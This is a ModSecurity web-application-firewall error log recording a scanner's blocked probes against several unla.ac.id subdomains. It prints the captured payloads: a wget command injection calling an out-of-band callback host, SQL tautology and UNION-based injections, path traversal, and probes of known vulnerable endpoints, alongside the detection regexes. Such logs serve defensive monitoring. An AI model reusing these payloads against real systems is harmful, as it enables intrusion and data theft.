[Tue Aug 29 11:30:34.417281 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlghtyrt9ok6g4pg.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPahv4AAAAL"]
[Tue Aug 29 11:30:34.428929 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlgx4rg1q3phezam.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPOhY4AAAAa"]
[Tue Aug 29 11:30:34.440301 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlgzsib3147jsd19.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAO8750AAAAF"]
[Tue Aug 29 11:30:34.442928 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAOOuV0AAAAW"]
[Tue Aug 29 11:30:34.449216 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAANjpzAAAAAT"]
[Tue Aug 29 11:30:34.460646 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPDnx8AAAAP"]
[Tue Aug 29 11:30:34.461021 2023] [:error] [pid 1008] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPw@TwAAAAR"]
[Tue Aug 29 11:30:34.467354 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPDnx8AAAAP"]
[Tue Aug 29 11:30:34.468063 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPOhZAAAAAa"]
[Tue Aug 29 11:30:34.472625 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAOOuV4AAAAW"]
[Tue Aug 29 11:30:34.479082 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAOOuV4AAAAW"]
[Tue Aug 29 11:30:35.347417 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAO8758AAAAF"]
[Tue Aug 29 11:30:35.351216 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPiBgUAAAAB"]
[Tue Aug 29 11:30:35.354358 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10a8Co-f0AAAPmhMQAAAAV"]
[Tue Aug 29 11:30:35.368374 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPpWcwAAAAI"]
[Tue Aug 29 11:30:35.469207 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlgp6o9eqtqgdxgu.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10a8Co-f0AAAOOuV8AAAAW"]
[Tue Aug 29 11:30:35.484372 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPv-EoAAAAM"]
[Tue Aug 29 11:30:35.492257 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAPXAmoAAAAi"]
[Tue Aug 29 11:30:35.801371 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAPpWc0AAAAI"]
[Tue Aug 29 11:30:36.056491 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10bMCo-f0AAAPOhZMAAAAa"]
[Tue Aug 29 11:30:36.093404 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10bMCo-f0AAANh1r4AAAAA"]
[Tue Aug 29 11:30:36.176534 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10bMCo-f0AAAO876QAAAAF"]
[Tue Aug 29 11:30:36.177025 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10bMCo-f0AAAPahwMAAAAL"]
[Tue Aug 29 11:30:36.341675 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAO876cAAAAF"]
[Tue Aug 29 11:30:36.346214 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPMmAoAAAAY"]
[Tue Aug 29 11:30:36.354822 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10bMCo-f0AAAPxBSkAAAAS"]
[Tue Aug 29 11:30:36.392804 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAANh1sEAAAAA"]
[Tue Aug 29 11:30:36.392804 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPMmAsAAAAY"]
[Tue Aug 29 11:30:36.395913 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10bMCo-f0AAAPiBgwAAAAB"]
[Tue Aug 29 11:30:36.412741 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10bMCo-f0AAAOOuWUAAAAW"]
[Tue Aug 29 11:30:37.316317 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPpWdIAAAAI"]
[Tue Aug 29 11:30:37.323860 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAOH4UYAAAAH"]
[Tue Aug 29 11:30:37.327560 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAO876kAAAAF"]
[Tue Aug 29 11:30:37.339002 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPMmA0AAAAY"]
[Tue Aug 29 11:30:37.408585 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAOM4XQAAAAU"]
[Tue Aug 29 11:30:37.429441 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPDnyQAAAAP"]
